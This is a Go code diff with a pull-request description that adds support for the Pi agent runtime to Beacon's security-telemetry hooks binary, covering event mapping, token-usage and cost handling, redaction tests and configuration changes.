+	reasoningFields["content"] = retainedContentFields(reasoning)
+	return append(events, normalizedEvent{
+		action: "agent.reasoning", category: "session", severity: "info",
+		message: "Pi agent reasoning captured", fields: reasoningFields,
+	})
+}
+
+// piUsage maps Pi's usage object onto gen_ai.usage.
+//
+// gen_ai.usage is the only token representation Beacon has, and its member names mirror the OTel
+// GenAI semconv exactly, so this is a rename rather than a new shape. Pi's own field names are
+// accepted in both casings because the extension forwards its usage object unchanged.
+//
+// Pi's totalTokens is deliberately dropped. The schema has no total member -- it is input plus
+// output, derivable by any consumer -- and adding one would be the parallel token field the schema
+// rules exist to prevent, with the added hazard that a stored total and a stored breakdown can
+// disagree.
+//
+// Only cost.total maps to cost_usd, and only because Pi computes it: cost_usd carries
+// runtime-reported cost and is never derived from a local pricing table. Pi's per-category costs
+// have no schema member and are dropped rather than summed into something Pi did not report.
+func piUsage(input map[string]interface{}) map[string]interface{} {
+	usageInput := jsonMap(input, "usage")
+	if len(usageInput) == 0 {
+		return nil
+	}
+	usage := map[string]interface{}{}
+	if value, ok := firstToolIntAcross([]map[string]interface{}{usageInput}, "input", "input_tokens", "inputTokens"); ok {
+		usage["input_tokens"] = value
+	}
+	if value, ok := firstToolIntAcross([]map[string]interface{}{usageInput}, "output", "output_tokens", "outputTokens"); ok {
+		usage["output_tokens"] = value
+	}
+	if value, ok := firstToolIntAcross([]map[string]interface{}{usageInput}, "cacheRead", "cache_read", "cacheReadTokens"); ok {
+		usage["cache_read"] = map[string]interface{}{"input_tokens": value}
+	}
+	if value, ok := firstToolIntAcross([]map[string]interface{}{usageInput}, "cacheWrite", "cache_write", "cacheWriteTokens"); ok {
+		usage["cache_creation"] = map[string]interface{}{"input_tokens": value}
+	}
+	if value, ok := firstToolIntAcross([]map[string]interface{}{usageInput}, "reasoning", "reasoning_tokens", "reasoningTokens"); ok {
+		usage["reasoning"] = map[string]interface{}{"output_tokens": value}
+	}
+	if cost, ok := piCost(usageInput); ok {
+		usage["cost_usd"] = cost
+	}
+	return usage
+}
+
+// piCost reads the runtime-reported total cost.
+//
+// Pi nests it as usage.cost.total. A bare usage.cost number is also accepted because that is the
+// shape every other runtime Beacon reads uses, and a Pi version that flattens it should not
+// silently stop reporting cost.
+func piCost(usageInput map[string]interface{}) (float64, bool) {
+	if cost := jsonMap(usageInput, "cost"); len(cost) > 0 {
+		return jsonFloat(cost["total"])
+	}
+	return jsonFloat(usageInput["cost"])
+}
+
+func piToolName(input map[string]interface{}) string {
+	return getFirstStr(input, "tool_name", "toolName", "tool")
+}
+
+// piToolAction classifies a completed tool by name, through the same shared classifier every other
+// runtime uses. Pi has no fixed tool vocabulary -- extensions register their own tools -- so a
+// per-runtime table would be wrong the moment somebody installs one, while the shared name-token
+// rules degrade to tool.completed for anything unrecognized.
+func piToolAction(input map[string]interface{}) (string, string) {
+	name := piToolName(input)
+	switch action := actionForTool("", name); action {
+	case "mcp.tool_invoked":
+		return action, "mcp"
+	case "command.executed":
+		return action, "command"
+	case "file.read":
+		return action, "file"
+	case "file.modified":
+		// A file-editing tool that never said which file it touched cannot be reported as a file
+		// event: file.path is what a rule or a query matches on, and an empty one is worse than a
+		// generic completion because it looks like a real file event with a missing field.
+		if piToolPath(jsonMap(input, "tool_input", "toolInput", "input", "arguments")) == "" {
+			return "tool.completed", "tool"
+		}
+		return action, "file"
+	default:
+		// actionForTool's fallback is tool.invoked, which is the pre-execution action. A result has
+		// by definition already run.
+		return "tool.completed", "tool"
+	}
+}
+
+func piToolMessage(action string) string {
+	switch action {
+	case "command.executed":
+		return "Pi shell command executed"
+	case "file.read":
+		return "Pi file read"
+	case "file.modified":
+		return "Pi file modified"
+	case "mcp.tool_invoked":
+		return "Pi MCP tool executed"
+	default:
+		return "Pi tool completed"
+	}
+}
+
+func piToolPath(toolInput map[string]interface{}) string {
+	return hookdiff.NormalizePath(firstToolString(toolInput, "file_path", "filePath", "path", "target", "destination"))
+}
+
+// piIsError reads Pi's isError flag, which is a boolean in the contract but is accepted as a string
+// too: JSON written by hand in a test or by a future extension version should not silently mean
+// "succeeded" because it says "true" rather than true.
+func piIsError(input map[string]interface{}) bool {
+	for _, key := range []string{"is_error", "isError", "error"} {
+		switch typed := input[key].(type) {
+		case bool:
+			if typed {
+				return true
+			}
+		case string:
+			if strings.EqualFold(strings.TrimSpace(typed), "true") {
+				return true
+			}
+		}
+	}
+	return false
+}

--- a/cli/beacon-hooks/cmd/pi_event_test.go
+++ b/cli/beacon-hooks/cmd/pi_event_test.go
@@ -329,7 +329,7 @@ func TestPiEventToolFailureIsRecordedAsFailed(t *testing.T) {
 	if got := nestedMap(t, event, "error")["type"]; got != "tool_error" {
 		t.Fatalf("error.type = %q, want tool_error", got)
 	}
-	if got := nestedMap(t, event, "event")["severity"]; got != nil && got != "high" {
+	if got := event["severity"]; got != "high" {
 		t.Fatalf("severity = %#v, want high", got)
 	}
 }

--- a/cli/beacon-hooks/cmd/pi_event_test.go
+++ b/cli/beacon-hooks/cmd/pi_event_test.go
@@ -1,0 +1,528 @@
+package cmd
+
+import (
+	"os"
+	"path/filepath"
+	"testing"
+)
+
+// setupPiEvent puts a Pi hook run in a sandbox: config directories under a temp dir, a temp runtime
+// log, and full content retention so the retained-text assertions have something to inspect.
+func setupPiEvent(t *testing.T) string {
+	t.Helper()
+	setupHookConfigDirs(t)
+	platformFlag = "pi"
+	logPath := filepath.Join(t.TempDir(), "runtime.jsonl")
+	t.Setenv("BEACON_ENDPOINT_MODE", "1")
+	t.Setenv("BEACON_ENDPOINT_LOG", logPath)
+	t.Setenv("BEACON_CONTENT_RETENTION", "full")
+	// Git enrichment shells out to the real git in whatever directory the payload names, which makes
+	// the result depend on the machine running the suite.
+	t.Setenv("BEACON_DISABLE_GIT_METADATA", "1")
+	return logPath
+}
+
+// requireNoEndpointEvents asserts that a payload produced no telemetry at all. Checked by the log's
+// absence rather than by an empty-file read, because the sink creates the file only on first write.
+func requireNoEndpointEvents(t *testing.T, logPath string) {
+	t.Helper()
+	if _, err := os.Stat(logPath); err == nil {
+		t.Fatalf("an event was written to %s, want none", logPath)
+	} else if !os.IsNotExist(err) {
+		t.Fatalf("stat endpoint log: %v", err)
+	}
+}
+
+func eventAction(t *testing.T, event map[string]interface{}) string {
+	t.Helper()
+	meta, ok := event["event"].(map[string]interface{})
+	if !ok {
+		t.Fatalf("event has no event object: %#v", event)
+	}
+	action, _ := meta["action"].(string)
+	return action
+}
+
+func nestedMap(t *testing.T, event map[string]interface{}, keys ...string) map[string]interface{} {
+	t.Helper()
+	current := event
+	for _, key := range keys {
+		next, ok := current[key].(map[string]interface{})
+		if !ok {
+			t.Fatalf("event is missing %v (stopped at %q): %#v", keys, key, event)
+		}
+		current = next
+	}
+	return current
+}
+
+func TestPiEventRecordsSessionStart(t *testing.T) {
+	logPath := setupPiEvent(t)
+
+	out := runHookWithInput(t, runPiEvent, map[string]interface{}{
+		"type":       "session_start",
+		"session_id": "pi-session-1",
+		"cwd":        "/tmp/project",
+		"reason":     "startup",
+		"model":      "anthropic/claude-sonnet-4",
+	})
+	if len(out) != 0 {
+		t.Fatalf("response = %#v, want empty object", out)
+	}
+
+	event := lastEndpointEvent(t, logPath)
+	if got := eventAction(t, event); got != "session.started" {
+		t.Fatalf("event.action = %q, want session.started", got)
+	}
+	if got := nestedMap(t, event, "session")["id"]; got != "pi-session-1" {
+		t.Fatalf("session.id = %q, want pi-session-1", got)
+	}
+	if got := nestedMap(t, event, "session")["working_directory"]; got != "/tmp/project" {
+		t.Fatalf("session.working_directory = %q, want /tmp/project", got)
+	}
+	if got := event["model"]; got != "anthropic/claude-sonnet-4" {
+		t.Fatalf("model = %q, want the Pi model", got)
+	}
+}
+
+// The canonical harness name has to appear on Pi events for the same reason discovery reports it:
+// events grouped by harness.name must not split one runtime across two spellings.
+func TestPiEventRecordsCanonicalHarnessName(t *testing.T) {
+	logPath := setupPiEvent(t)
+
+	runHookWithInput(t, runPiEvent, map[string]interface{}{
+		"type":       "session_start",
+		"session_id": "pi-session-1",
+	})
+
+	event := lastEndpointEvent(t, logPath)
+	if got := nestedMap(t, event, "harness")["name"]; got != "pi_cli" {
+		t.Fatalf("harness.name = %q, want pi_cli", got)
+	}
+}
+
+// Running pi-event is itself the statement that the platform is Pi. A hand-written invocation, or
+// an installed command whose --platform was lost, must still classify as Pi rather than silently
+// inheriting the default and misreporting the runtime.
+func TestPiEventPinsPlatformRegardlessOfFlag(t *testing.T) {
+	logPath := setupPiEvent(t)
+	platformFlag = "claude"
+
+	runHookWithInput(t, runPiEvent, map[string]interface{}{
+		"type":       "session_start",
+		"session_id": "pi-session-1",
+	})
+
+	event := lastEndpointEvent(t, logPath)
+	if got := nestedMap(t, event, "harness")["name"]; got != "pi_cli" {
+		t.Fatalf("harness.name = %q, want pi_cli even though --platform said claude", got)
+	}
+}
+
+func TestPiEventRecordsPromptWithRedaction(t *testing.T) {
+	logPath := setupPiEvent(t)
+
+	runHookWithInput(t, runPiEvent, map[string]interface{}{
+		"type":       "input",
+		"session_id": "pi-session-1",
+		"cwd":        "/tmp/project",
+		"prompt":     "deploy with token=pi-secret",
+	})
+
+	event := lastEndpointEvent(t, logPath)
+	if got := eventAction(t, event); got != "prompt.submitted" {
+		t.Fatalf("event.action = %q, want prompt.submitted", got)
+	}
+	if got := nestedMap(t, event, "prompt")["text"]; got != "deploy with token=[REDACTED]" {
+		t.Fatalf("prompt.text = %q, want the secret redacted", got)
+	}
+	// The content marker is computed against the original text, so it describes what the runtime
+	// produced rather than what the sink stored.
+	content := nestedMap(t, event, "content")
+	if content["redacted"] != true {
+		t.Fatalf("content.redacted = %#v, want true", content["redacted"])
+	}
+	if content["included"] != true {
+		t.Fatalf("content.included = %#v, want true", content["included"])
+	}
+}
+
+// An input event with no text is dropped rather than written as an empty prompt: a prompt.submitted
+// carrying no prompt is indistinguishable from a capture failure when someone reads the log.
+func TestPiEventDropsEmptyPrompt(t *testing.T) {
+	logPath := setupPiEvent(t)
+
+	runHookWithInput(t, runPiEvent, map[string]interface{}{
+		"type":       "input",
+		"session_id": "pi-session-1",
+		"prompt":     "",
+	})
+
+	requireNoEndpointEvents(t, logPath)
+}
+
+// tool_call fires before the tool runs. Recording a shell call as command.executed here would
+// report a command that may still be blocked and never run.
+func TestPiEventToolCallIsInvokedNotExecuted(t *testing.T) {
+	logPath := setupPiEvent(t)
+
+	runHookWithInput(t, runPiEvent, map[string]interface{}{
+		"type":         "tool_call",
+		"session_id":   "pi-session-1",
+		"cwd":          "/tmp/project",
+		"tool_name":    "bash",
+		"tool_call_id": "call-1",
+		"tool_input":   map[string]interface{}{"command": "rm -rf build"},
+	})
+
+	event := lastEndpointEvent(t, logPath)
+	if got := eventAction(t, event); got != "tool.invoked" {
+		t.Fatalf("event.action = %q, want tool.invoked for a pre-execution event", got)
+	}
+	if got := nestedMap(t, event, "command")["command"]; got != "rm -rf build" {
+		t.Fatalf("command.command = %q, want the command", got)
+	}
+	call := nestedMap(t, event, "gen_ai", "tool", "call")
+	if call["id"] != "call-1" {
+		t.Fatalf("gen_ai.tool.call.id = %#v, want call-1", call["id"])
+	}
+	if _, ok := call["result"]; ok {
+		t.Fatal("gen_ai.tool.call.result was set on a pre-execution event")
+	}
+}
+
+func TestPiEventToolResultActions(t *testing.T) {
+	for _, tc := range []struct {
+		name       string
+		toolName   string
+		toolInput  map[string]interface{}
+		wantAction string
+	}{
+		{"shell", "bash", map[string]interface{}{"command": "ls"}, "command.executed"},
+		{"read", "read", map[string]interface{}{"file_path": "/tmp/project/main.go"}, "file.read"},
+		{"edit", "edit", map[string]interface{}{"file_path": "/tmp/project/main.go"}, "file.modified"},
+		{"write", "write", map[string]interface{}{"file_path": "/tmp/project/new.go"}, "file.modified"},
+		{"mcp", "mcp__github__list_issues", map[string]interface{}{}, "mcp.tool_invoked"},
+		{"unknown", "sparkle", map[string]interface{}{}, "tool.completed"},
+	} {
+		t.Run(tc.name, func(t *testing.T) {
+			logPath := setupPiEvent(t)
+
+			runHookWithInput(t, runPiEvent, map[string]interface{}{
+				"type":       "tool_result",
+				"session_id": "pi-session-1",
+				"cwd":        "/tmp/project",
+				"tool_name":  tc.toolName,
+				"tool_input": tc.toolInput,
+			})
+
+			event := lastEndpointEvent(t, logPath)
+			if got := eventAction(t, event); got != tc.wantAction {
+				t.Fatalf("tool %q produced action %q, want %q", tc.toolName, got, tc.wantAction)
+			}
+		})
+	}
+}
+
+// Pi's built-in tools are lowercase, which the default file-edit classifier -- Claude's exact
+// capitalized names -- recognizes as nothing. Without a Pi branch every edit was a generic tool
+// completion carrying no file.path, and a threat rule matching on file.path saw no file activity.
+func TestPiEventFileEditCarriesPathAndDiff(t *testing.T) {
+	logPath := setupPiEvent(t)
+
+	runHookWithInput(t, runPiEvent, map[string]interface{}{
+		"type":       "tool_result",
+		"session_id": "pi-session-1",
+		"cwd":        "/tmp/project",
+		"tool_name":  "edit",
+		"tool_input": map[string]interface{}{
+			"file_path":  "/tmp/project/main.go",
+			"old_string": "package main",
+			"new_string": "package main // edited",
+		},
+	})
+
+	event := lastEndpointEvent(t, logPath)
+	if got := eventAction(t, event); got != "file.modified" {
+		t.Fatalf("event.action = %q, want file.modified", got)
+	}
+	file := nestedMap(t, event, "file")
+	if file["path"] != "/tmp/project/main.go" {
+		t.Fatalf("file.path = %#v, want the edited path", file["path"])
+	}
+	if file["operation"] != "modify" {
+		t.Fatalf("file.operation = %#v, want modify", file["operation"])
+	}
+	// The diff itself is summarized rather than stored raw here; the hash and byte count are what
+	// prove a diff was computed at all.
+	if file["diff_hash"] == nil || file["diff_hash"] == "" {
+		t.Fatalf("file.diff_hash is empty; no diff was computed: %#v", file)
+	}
+}
+
+// A file-editing tool that never said which file it touched must not be reported as a file event.
+// file.path is what rules and queries match on, and an absent one on a file.modified event looks
+// like a capture bug rather than a tool that reported nothing.
+func TestPiEventFileEditWithoutPathFallsBackToToolCompleted(t *testing.T) {
+	logPath := setupPiEvent(t)
+
+	runHookWithInput(t, runPiEvent, map[string]interface{}{
+		"type":       "tool_result",
+		"session_id": "pi-session-1",
+		"tool_name":  "edit",
+		"tool_input": map[string]interface{}{"pattern": "*.go"},
+	})
+
+	event := lastEndpointEvent(t, logPath)
+	if got := eventAction(t, event); got != "tool.completed" {
+		t.Fatalf("event.action = %q, want tool.completed when no path was reported", got)
+	}
+	if _, ok := event["file"]; ok {
+		t.Fatalf("a file object was written with no path: %#v", event["file"])
+	}
+}
+
+func TestPiEventCommandResultCarriesExitCodeAndDuration(t *testing.T) {
+	logPath := setupPiEvent(t)
+
+	runHookWithInput(t, runPiEvent, map[string]interface{}{
+		"type":          "tool_result",
+		"session_id":    "pi-session-1",
+		"cwd":           "/tmp/project",
+		"tool_name":     "bash",
+		"tool_input":    map[string]interface{}{"command": "go test ./..."},
+		"tool_response": map[string]interface{}{"output": "ok", "exit_code": float64(2)},
+		"duration_ms":   float64(1500),
+	})
+
+	event := lastEndpointEvent(t, logPath)
+	if got := eventAction(t, event); got != "command.executed" {
+		t.Fatalf("event.action = %q, want command.executed", got)
+	}
+	command := nestedMap(t, event, "command")
+	if command["command"] != "go test ./..." {
+		t.Fatalf("command.command = %#v", command["command"])
+	}
+	if command["exit_code"] != float64(2) {
+		t.Fatalf("command.exit_code = %#v, want 2", command["exit_code"])
+	}
+	if command["duration_ms"] != float64(1500) {
+		t.Fatalf("command.duration_ms = %#v, want 1500", command["duration_ms"])
+	}
+}
+
+func TestPiEventToolFailureIsRecordedAsFailed(t *testing.T) {
+	logPath := setupPiEvent(t)
+
+	runHookWithInput(t, runPiEvent, map[string]interface{}{
+		"type":       "tool_result",
+		"session_id": "pi-session-1",
+		"tool_name":  "bash",
+		"tool_input": map[string]interface{}{"command": "false"},
+		"is_error":   true,
+	})
+
+	event := lastEndpointEvent(t, logPath)
+	if got := eventAction(t, event); got != "tool.failed" {
+		t.Fatalf("event.action = %q, want tool.failed", got)
+	}
+	if got := nestedMap(t, event, "error")["type"]; got != "tool_error" {
+		t.Fatalf("error.type = %q, want tool_error", got)
+	}
+	if got := nestedMap(t, event, "event")["severity"]; got != nil && got != "high" {
+		t.Fatalf("severity = %#v, want high", got)
+	}
+}
+
+// A JSON string "true" must not read as success. An extension version that serializes the flag as
+// text would otherwise turn every failed tool into a successful one, which is the direction that
+// hides real activity.
+func TestPiEventToolFailureAcceptsStringFlag(t *testing.T) {
+	logPath := setupPiEvent(t)
+
+	runHookWithInput(t, runPiEvent, map[string]interface{}{
+		"type":       "tool_result",
+		"session_id": "pi-session-1",
+		"tool_name":  "bash",
+		"tool_input": map[string]interface{}{"command": "false"},
+		"isError":    "true",
+	})
+
+	event := lastEndpointEvent(t, logPath)
+	if got := eventAction(t, event); got != "tool.failed" {
+		t.Fatalf("event.action = %q, want tool.failed for a string-encoded flag", got)
+	}
+}
+
+// gen_ai.usage is Beacon's only token representation, and Pi reports the full breakdown including
+// cache reads, cache writes and a runtime-computed cost. This is the event the token attribution
+// rollups and `beacon token-usage` are built on.
+func TestPiEventRecordsTokenUsage(t *testing.T) {
+	logPath := setupPiEvent(t)
+
+	runHookWithInput(t, runPiEvent, map[string]interface{}{
+		"type":       "message_end",
+		"session_id": "pi-session-1",
+		"cwd":        "/tmp/project",
+		"model":      "anthropic/claude-sonnet-4",
+		"usage": map[string]interface{}{
+			"input":       float64(1200),
+			"output":      float64(340),
+			"cacheRead":   float64(900),
+			"cacheWrite":  float64(120),
+			"totalTokens": float64(1540),
+			"cost": map[string]interface{}{
+				"input": 0.001,
+				"total": 0.0123,
+			},
+		},
+		"finish_reason": "end_turn",
+		"message_id":    "msg-1",
+	})
+
+	event := lastEndpointEvent(t, logPath)
+	if got := eventAction(t, event); got != "agent.response.completed" {
+		t.Fatalf("event.action = %q, want agent.response.completed", got)
+	}
+	usage := nestedMap(t, event, "gen_ai", "usage")
+	for key, want := range map[string]interface{}{
+		"input_tokens":  float64(1200),
+		"output_tokens": float64(340),
+		"cost_usd":      0.0123,
+	} {
+		if usage[key] != want {
+			t.Fatalf("gen_ai.usage.%s = %#v, want %#v", key, usage[key], want)
+		}
+	}
+	if got := nestedMap(t, event, "gen_ai", "usage", "cache_read")["input_tokens"]; got != float64(900) {
+		t.Fatalf("gen_ai.usage.cache_read.input_tokens = %#v, want 900", got)
+	}
+	if got := nestedMap(t, event, "gen_ai", "usage", "cache_creation")["input_tokens"]; got != float64(120) {
+		t.Fatalf("gen_ai.usage.cache_creation.input_tokens = %#v, want 120", got)
+	}
+}
+
+// Pi reports totalTokens; the schema has no total member and must not grow one. A parallel total is
+// exactly the per-harness token field the schema rules forbid, and a stored total can contradict a
+// stored breakdown.
+func TestPiEventDropsRuntimeTotalTokens(t *testing.T) {
+	logPath := setupPiEvent(t)
+
+	runHookWithInput(t, runPiEvent, map[string]interface{}{
+		"type":       "message_end",
+		"session_id": "pi-session-1",
+		"usage": map[string]interface{}{
+			"input":       float64(10),
+			"output":      float64(5),
+			"totalTokens": float64(15),
+		},
+	})
+
+	usage := nestedMap(t, lastEndpointEvent(t, logPath), "gen_ai", "usage")
+	for _, key := range []string{"total_tokens", "totalTokens", "total"} {
+		if _, ok := usage[key]; ok {
+			t.Fatalf("gen_ai.usage.%s was written; token usage has no total member", key)
+		}
+	}
+}
+
+// cost_usd carries runtime-reported cost only. Pi nests the total under usage.cost.total, and the
+// per-category costs beside it have no schema member -- summing or repurposing them would be
+// deriving a number Pi did not report.
+func TestPiEventCostUsesRuntimeTotalOnly(t *testing.T) {
+	logPath := setupPiEvent(t)
+
+	runHookWithInput(t, runPiEvent, map[string]interface{}{
+		"type":       "message_end",
+		"session_id": "pi-session-1",
+		"usage": map[string]interface{}{
+			"input":  float64(10),
+			"output": float64(5),
+			"cost": map[string]interface{}{
+				"input":     0.002,
+				"output":    0.003,
+				"cacheRead": 0.001,
+				"total":     0.006,
+			},
+		},
+	})
+
+	usage := nestedMap(t, lastEndpointEvent(t, logPath), "gen_ai", "usage")
+	if usage["cost_usd"] != 0.006 {
+		t.Fatalf("gen_ai.usage.cost_usd = %#v, want the runtime total 0.006", usage["cost_usd"])
+	}
+}
+
+// Reasoning is its own signal with its own retention decision, so an assistant message that carried
+// thinking text produces two events. Folding them together would give one event whose content
+// marker describes two different pieces of text.
+func TestPiEventEmitsReasoningAlongsideResponse(t *testing.T) {
+	logPath := setupPiEvent(t)
+
+	runHookWithInput(t, runPiEvent, map[string]interface{}{
+		"type":       "message_end",
+		"session_id": "pi-session-1",
+		"cwd":        "/tmp/project",
+		"reasoning":  "First I will read the config.",
+		"usage":      map[string]interface{}{"input": float64(10), "output": float64(5)},
+	})
+
+	events := endpointEvents(t, logPath)
+	if len(events) != 2 {
+		t.Fatalf("got %d events, want a response and a reasoning event", len(events))
+	}
+	actions := map[string]map[string]interface{}{}
+	for _, event := range events {
+		actions[eventAction(t, event)] = event
+	}
+	response, ok := actions["agent.response.completed"]
+	if !ok {
+		t.Fatalf("no agent.response.completed event: %#v", actions)
+	}
+	reasoning, ok := actions["agent.reasoning"]
+	if !ok {
+		t.Fatalf("no agent.reasoning event: %#v", actions)
+	}
+
+	parts, _ := nestedMap(t, reasoning, "gen_ai", "output")["messages"].([]interface{})
+	if len(parts) == 0 {
+		t.Fatalf("agent.reasoning has no gen_ai.output.messages: %#v", reasoning["gen_ai"])
+	}
+
+	// The two events must not alias each other's nested maps: the response event carries usage, the
+	// reasoning event carries reasoning output, and neither may carry the other's.
+	if _, ok := nestedMap(t, reasoning, "gen_ai")["usage"]; ok {
+		t.Fatal("the reasoning event carried the response event's usage; the field maps are aliased")
+	}
+	if _, ok := nestedMap(t, response, "gen_ai")["output"]; ok {
+		t.Fatal("the response event carried the reasoning event's output; the field maps are aliased")
+	}
+}
+
+func TestPiEventDropsUnmappedEventTypes(t *testing.T) {
+	logPath := setupPiEvent(t)
+
+	for _, eventType := range []string{"model_select", "before_provider_request", "turn_start", ""} {
+		runHookWithInput(t, runPiEvent, map[string]interface{}{
+			"type":       eventType,
+			"session_id": "pi-session-1",
+		})
+	}
+
+	requireNoEndpointEvents(t, logPath)
+}
+
+// Pi runs this as a subprocess of an interactive session. Unparseable stdin still gets a valid empty
+// reply, because a non-zero exit or a missing response makes the user's agent look broken -- a worse
+// outcome than losing one event.
+func TestPiEventAnswersMalformedInput(t *testing.T) {
+	setupPiEvent(t)
+
+	out := runHookWithRawInput(t, runPiEvent, "{not json")
+	if out == nil {
+		t.Fatal("pi-event produced no response for malformed input")
+	}
+	if len(out) != 0 {
+		t.Fatalf("response = %#v, want empty object", out)
+	}
+}

--- a/cli/beacon-hooks/cmd/post_tool.go
+++ b/cli/beacon-hooks/cmd/post_tool.go
@@ -405,6 +405,20 @@ func isFileEditTool(platform, toolName string) bool {
 			strings.Contains(lower, "create") ||
 			strings.Contains(lower, "patch")
 	}
+	if platform == "pi" {
+		// Pi's built-in tools are lowercase, so the default branch below -- which matches Claude's
+		// exact capitalized names -- recognizes none of them, and every file edit would have been
+		// recorded as a generic tool completion with no file.path to match a rule against.
+		//
+		// Substring rather than an exact list because Pi has no fixed tool vocabulary: extensions
+		// register their own tools, and a name like "write_file" or "apply_patch" from one of them
+		// is as much a file edit as the built-in.
+		lower := strings.ToLower(toolName)
+		return strings.Contains(lower, "edit") ||
+			strings.Contains(lower, "write") ||
+			strings.Contains(lower, "create") ||
+			strings.Contains(lower, "patch")
+	}
 	return toolName == "Write" || toolName == "Edit" || toolName == "MultiEdit"
 }
 

--- a/cli/beacon-hooks/cmd/pre_tool_test.go
+++ b/cli/beacon-hooks/cmd/pre_tool_test.go
@@ -904,6 +904,7 @@ func setupHookConfigDirs(t *testing.T) {
 	origGrokDir := hookconfig.GrokDir
 	origHermesDir := hookconfig.HermesDir
 	origOpenCodeDir := hookconfig.OpenCodeDir
+	origPiDir := hookconfig.PiDir
 	origPlatform := platformFlag
 	hookconfig.BeaconDir = tmp
 	hookconfig.ClaudeDir = filepath.Join(tmp, "claude")
@@ -916,6 +917,7 @@ func setupHookConfigDirs(t *testing.T) {
 	hookconfig.GrokDir = filepath.Join(tmp, "grok")
 	hookconfig.HermesDir = filepath.Join(tmp, "hermes")
 	hookconfig.OpenCodeDir = filepath.Join(tmp, "opencode")
+	hookconfig.PiDir = filepath.Join(tmp, "pi")
 	t.Cleanup(func() {
 		hookconfig.BeaconDir = origBeaconDir
 		hookconfig.ClaudeDir = origClaudeDir
@@ -928,11 +930,25 @@ func setupHookConfigDirs(t *testing.T) {
 		hookconfig.GrokDir = origGrokDir
 		hookconfig.HermesDir = origHermesDir
 		hookconfig.OpenCodeDir = origOpenCodeDir
+		hookconfig.PiDir = origPiDir
 		platformFlag = origPlatform
 	})
 }
 
 func runHookWithInput(t *testing.T, run func(cmd *cobra.Command, args []string), input map[string]interface{}) map[string]interface{} {
+	t.Helper()
+	raw, err := json.Marshal(input)
+	if err != nil {
+		t.Fatalf("marshal input: %v", err)
+	}
+	return runHookWithRawInput(t, run, string(raw))
+}
+
+// runHookWithRawInput drives a hook with the exact bytes given, rather than with a payload this
+// helper encodes. It exists for the malformed-stdin cases: a hook that answers an interactive
+// runtime must still produce a valid reply when handed something that is not JSON at all, and that
+// property cannot be exercised through a map.
+func runHookWithRawInput(t *testing.T, run func(cmd *cobra.Command, args []string), raw string) map[string]interface{} {
 	t.Helper()
 	stdinR, stdinW, err := os.Pipe()
 	if err != nil {
@@ -966,15 +982,15 @@ func runHookWithInput(t *testing.T, run func(cmd *cobra.Command, args []string),
 	// so a large enough response would block inside run(). It is drained concurrently for that
 	// reason rather than for symmetry. This is the same failure the sandbox's drainStreams already
 	// documents, in the opposite direction.
-	encodeErr := make(chan error, 1)
+	writeErr := make(chan error, 1)
 	go func() {
-		err := json.NewEncoder(stdinW).Encode(input)
+		_, err := io.WriteString(stdinW, raw)
 		// Closed here, not deferred by the caller: the hook reads stdin to EOF, so it only returns
 		// once this end is closed.
 		if cerr := stdinW.Close(); err == nil {
 			err = cerr
 		}
-		encodeErr <- err
+		writeErr <- err
 	}()
 
 	type readResult struct {
@@ -996,8 +1012,8 @@ func runHookWithInput(t *testing.T, run func(cmd *cobra.Command, args []string),
 	os.Stdin = origStdin
 	os.Stdout = origStdout
 
-	if err := <-encodeErr; err != nil {
-		t.Fatalf("encode input: %v", err)
+	if err := <-writeErr; err != nil {
+		t.Fatalf("write hook input: %v", err)
 	}
 	captured := <-stdoutDone
 	if captured.err != nil {

--- a/cli/beacon-hooks/cmd/root.go
+++ b/cli/beacon-hooks/cmd/root.go
@@ -29,8 +29,8 @@ var (
 
 var rootCmd = &cobra.Command{
 	Use:   "beacon-hooks",
-	Short: "Beacon hooks for Claude Code, Codex, GitHub Copilot, Cursor, VS Code, Devin, Factory, Grok, Hermes, Antigravity, and opencode",
-	Long: `Beacon hooks binary for Claude Code, Codex, GitHub Copilot, Cursor, VS Code, Devin, Factory, Grok, Hermes, Antigravity, and opencode integration.
+	Short: "Beacon hooks for Claude Code, Codex, GitHub Copilot, Cursor, VS Code, Devin, Factory, Grok, Hermes, Antigravity, opencode, and Pi",
+	Long: `Beacon hooks binary for Claude Code, Codex, GitHub Copilot, Cursor, VS Code, Devin, Factory, Grok, Hermes, Antigravity, opencode, and Pi integration.
 
 This binary provides hook commands that are called by IDE plugin systems
 to evaluate code changes for security violations.
@@ -39,7 +39,7 @@ Use --platform to specify the calling platform (default: claude).`,
 }
 
 func init() {
-	rootCmd.PersistentFlags().StringVar(&platformFlag, "platform", "claude", "Platform context: claude, codex, antigravity, copilot, cursor, vscode, devin, devin-cli, devin-desktop, factory, grok, hermes, or opencode")
+	rootCmd.PersistentFlags().StringVar(&platformFlag, "platform", "claude", "Platform context: claude, codex, antigravity, copilot, cursor, vscode, devin, devin-cli, devin-desktop, factory, grok, hermes, opencode, or pi")
 	rootCmd.PersistentFlags().StringVar(&logFlag, "log", "", "Endpoint runtime log to append to (same value as BEACON_ENDPOINT_LOG)")
 	rootCmd.PersistentFlags().StringVar(&configFlag, "config", "", "Endpoint config to read (same value as BEACON_ENDPOINT_CONFIG)")
 	rootCmd.PersistentFlags().StringVar(&cliFlag, "cli", "", "Path to the beacon CLI for inventory heartbeats (same value as BEACON_ENDPOINT_CLI)")

--- a/cli/beacon-hooks/internal/config/config.go
+++ b/cli/beacon-hooks/internal/config/config.go
@@ -21,6 +21,7 @@ var (
 	GrokDir        = filepath.Join(BeaconDir, "grok")
 	HermesDir      = filepath.Join(BeaconDir, "hermes")
 	OpenCodeDir    = filepath.Join(BeaconDir, "opencode")
+	PiDir          = filepath.Join(BeaconDir, "pi")
 )
 
 // Log rotation
@@ -99,6 +100,8 @@ func GetStateDir(platform string) string {
 		return HermesDir
 	case "opencode":
 		return OpenCodeDir
+	case "pi":
+		return PiDir
 	default:
 		return ClaudeDir
 	}


### PR DESCRIPTION
Second of seven. **Base is `pi-pr1-identity` (#347), not `main`.** Adds the Go side of the Pi bridge — fully functional if invoked by hand with a payload on stdin; nothing invokes it yet.

## One subcommand, not eight branches

Pi has no hooks configuration, so there is nothing to merge per-hook commands into. One Beacon-installed extension forwards every event to one `pi-event` subcommand — the arrangement `opencode-event` already uses.

This is deliberately *not* the alternative of adding `case "pi"` branches to `pre_tool.go`, `post_tool.go`, `prompt_submit.go`, `stop.go`, `session_start.go`, `session_end.go`, and `agent_thought.go`. Eight shared files gaining a branch each, for a runtime whose payloads Beacon itself defines, buys nothing over one file that owns the whole mapping and can be read top to bottom.

It also keeps the extension a dumb forwarder: classification, redaction, schema mapping and the size budget stay in Go, where they are tested and where a fix reaches already-installed extensions without rewriting them.

The payload contract is documented field by field in the `pi_event.go` header. Both sides are Beacon's own code, so it is a fixed shape rather than a guess at somebody's API.

